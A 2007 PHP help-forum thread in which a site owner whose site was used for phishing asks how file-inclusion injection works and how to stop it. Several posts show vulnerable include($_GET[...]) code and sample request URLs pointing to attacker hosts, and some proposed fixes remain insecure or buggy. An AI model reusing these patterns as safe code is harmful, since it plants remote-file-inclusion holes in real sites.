crawlerbasher Posted May 3, 2007 Share Posted May 3, 2007 Recentley my site got hacked into and was used as a paltform for hosting a fake ebay site to steal passwords. After talking to my host provider, it has been made clear that one of php script could have data injected into it to upload files to my site. Now dose anyone have any more inforamtion on how this can be done, and how to prevent this from happening again? Quote Link to comment Share on other sites More sharing options...
ToonMariner Posted May 3, 2007 Share Posted May 3, 2007 yes check data before you use it. this is commone with include files, mysql queries or where you use exec(); make sure that you verify data that is going to be used in such cases. Quote Link to comment Share on other sites More sharing options...
crawlerbasher Posted May 3, 2007 Author Share Posted May 3, 2007 so an include("main.php") could be susetable to code injection? would say using include("http://www.test.com/main.php") help prevent this? And how can I verify data that would pass though? These are my own scripts, so its not as if I'm intending to grant ppl acsses to my site. Quote Link to comment Share on other sites More sharing options...
techtheatre Posted May 3, 2007 Share Posted May 3, 2007 include("main.php") is safe...(assuming no problems in main.php) If instead you were to have http://www.test.com/lookup.php?page=main.php where lookup.php had the following include("$page"); this would NOT be safe (anything could be passed as a value for the variable "$page" so you are potentially including anything... same idea for inserting data into SQL...if you are inserting variables that were passed by a site user you will want to check them first. encode the characters that could cause problems, and validate that number fields only contain numbers, email address fields contain valid email addresses, strip out things that are not allowed...etc. There is LOTS of info about this online, so just Google for "SQL Injection" and find a PHP function that will clean up your data. Quote Link to comment Share on other sites More sharing options...
Nameless12 Posted May 3, 2007 Share Posted May 3, 2007 I just had to share some code that cracks me up <?php // the request url = http://localhost/index.php?id=http://www.attackersWebpage.com/VeryNastyScript.php include ($_GET['id']); ?> oh and dont forget there are many other types of injection even someone just putting bold tags in their name so that they appear to be special wherever their name is used can be a nuisance, validate everything. (and the above attack can be protected against by modifying your php.ini) Quote Link to comment Share on other sites More sharing options...
crawlerbasher Posted May 4, 2007 Author Share Posted May 4, 2007 I've been doing some reading on this, and my head hurts. So much to think about. What was once a basic script, is now my down fall. (Caught with pants down). I've been thinking of possible ways around this and one of them (of the top of my head) is somthing like this: <?php $id = $_GET['id']; if ($id) { include("http://www.test.com/$id"); } ?> Now then if some one tryed to put in http://www.test.com?id=http://www.attacker.com/attacker.php Then this code would try to include http://www.test.com/http://www.attacker.com/attacker.php Now could somthing that simple work? What kind of problem could this corse? I'll keep researching this, and thanks for the help. Quote Link to comment Share on other sites More sharing options...
jscix Posted May 4, 2007 Share Posted May 4, 2007 You can make sure the file ext. trying to be included is .php, and you can make sure the file trying to be included is within a specific folder. This should make it a bit more secure also. Quote Link to comment Share on other sites More sharing options...
jscix Posted May 4, 2007 Share Posted May 4, 2007 Also, I recomend adding a logging feature, for failed includes. Normally people try multiple things before succeeding .. so you will at least have a log of your attacker. Quote Link to comment Share on other sites More sharing options...
crawlerbasher Posted May 4, 2007 Author Share Posted May 4, 2007 Will trying to get my head around this I would like other ppl that are not aware of this to keep this in mind. And I've found a good site that gives some simple exsamples of how to help with injections. http://www.acunetix.com/websitesecurity/php-security-1.htm I don't want ppl making the same mistakes I made. Quote Link to comment Share on other sites More sharing options...
clown[NOR] Posted May 4, 2007 Share Posted May 4, 2007 What I do with the include part of my index.php is that I always check for slashes and also I always use if (!file_exists()) { $include = "missing.php"; } so.. this is how my homepage part looks like: <?php $include = "home.php"; $show = $_GET['show']; $archive = $_GET['archive']; $aID = $_GET['aID']; if (isset($show)) { if (!isset($archive)) { $chkSlash = explode("/", $show); if (!empty($chkSlash[1])) { $include = stripslashes($chkSlash).".php"; } else { $include = "$show.php"; } } else { $chkArray = array($show, $archive, $aID); $chkSlash = explode("/", $chkArray); if (!empty($chkSlash[1])) { $include = stripslashes($chkSlash).".php"; } else { $include = "archive/$archive/$aID/$aID.php"; } } } if (!file_exists($include)) { $include = "missing.php"; } require_once($include); ?> i feel pretty safe when it comes to trying to mess with my URL... and I try to secure all my MySQL codes the best way i know how... like you guys said.. strip_tags(), stripslashes(), trim(), mysql_real_escape_string() etc... wish people had more to do than hacking other peoples sites... would save us a lot of work.. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.